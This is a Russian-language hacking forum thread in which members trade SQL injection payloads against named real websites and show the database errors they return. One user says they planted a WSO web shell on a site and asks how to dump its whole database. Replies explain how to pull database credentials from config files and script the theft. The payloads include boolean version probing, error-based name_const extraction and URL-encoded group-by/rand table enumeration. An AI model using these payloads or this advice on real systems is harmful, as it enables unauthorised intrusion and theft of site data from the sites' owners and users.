Если кавычки не слешируются, то можешь попробывать реализовать полноценную SQL-иньекцию, если файл сможешь прочитать как пхп код, то сможешь реализовать PHP-иньекцию, экспириментируй, все в твоих руках! P.S: если не ошибаюсь то кавычки не слешируются...
У меня вот это никак не крутится ни руками, ни софтом. Там вообще есть что-нибудь? Code: http://develop.belta.by/{тут инъекция, видно через ОПЕРУ} структура запроса Code: GET /1'"1000 HTTP/1.1 User-Agent: 1'"2000 referer: 1'"3000 client-ip: 1'"4000 x-forwarded-for: 1'"5000 accept-language: 1'"6000 via: 1'"7000 Cookie: PHPSESSID=4f4eba22b01c675b1c8b035f10e977ed Host: develop.belta.by Connection: Keep-alive Accept-Encoding: gzip,deflate Это ошибка вываливается в order by? Code: Ошибка при работе с базой данных. Пожалуйста, обратитесь к администратору. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
думаю это было утверждение, нежели вопрос) софтом не будет крутится, так как параметра уязвимого нет. Ну по крайней мере с sqlmap я не пробовал такое вытворять с order by будет крутиться только если это не error based + 5 версия mysql. В остальных случаях прийдется использовать другие параметры или другой набор слов. Попробуй использовать как параметр phpsessid, то есть сайт/1'&PHPSESSID=значение' и суй куда нибудь типа того же sqlmap. может поможет
asiaman Скуля там в URI. http://develop.belta.by/1'or(substring(version(),1,1)=5)and'1 - TRUE (Главная страница) http://develop.belta.by/1'or(substring(version(),1,1)=4)and'1 - FALSE (<##title>) Пробелы в такой скуле использовать нельзя, версия меньше, чем 5.1 (нету ф-ции ExtractValue). Вывод версии в ошибке: http://develop.belta.by/1'or(1,2)=(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'1 Duplicate column name '5.0.88-log' t3cHn0iD Нет.
URL encode: http://www.intersport.ru/products/cat/?cat_group_id=24&cat_producer_id=&id=149+or+1+%67%72%6F%75%70+by+concat(%20(%73%65%6C%65%63%74%20table_name+%66%72%6F%6D+information_schema.tables+limit+17,1),floor(rand(0)*2))%20having%20min(0)--+ -> 1062Duplicate entry 'banners1' for key 1
Помогите, пожалуйста. После после пост запроса email=%5c&pass=451&x=31&y=9 выдается ошибка: SQL Error(1064): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\' LIMIT 1' at line 1.[SELECT * FROM `member_account` WHERE email = '\' LIMIT 1] как раскрутить?
залил шелл wso на сайт. как теперь можно попасть в phpmyadmin или узнать данные от него? мне нужно скачать все таблицы с сайта
посмотри в папках есть ли он вобще, просмотри файли на хостинге, в какомто из них должен лежать скрипт для подключения к БД, там ты найдёшь логин пароль и тд. если нет phpmyadmin, то можно написать за 2 минуты простейшый скрипт для слива нужных таблиц,
Идёшь в скрипт с которого начинается процесс отдачи статики пользователю. Ищешь там(или в инклюдах) логин и пароль к базе. Заодно посмотри хост куда идёт подключение.
Тебе нужен скрипт настроек, это просто либа с функциями. Ищи файл, в котором происходит инклюд этого скрипта. Выше строки инклюда (хз насколько выше) должен быть или инклюд конфига (посмотри разные вариации слова "настройки" на английском), или сами настройки подключения к бд.
Мде... PHP: $version='MySQL RST/GHC Manager 2.3'; $copyright='© RusH Security Team © Antichat edition ©'; Сайт до тебя хекали уже. В index.php ищи инклюд конфига или кидай сюда.
почему это хекали? может просто версия базы данных античатовская? или я что то не понимаю? нах в конфиге писать про ачат. про какой индекс ты говоришь? главную страницу сайта? там есть обращение к базе?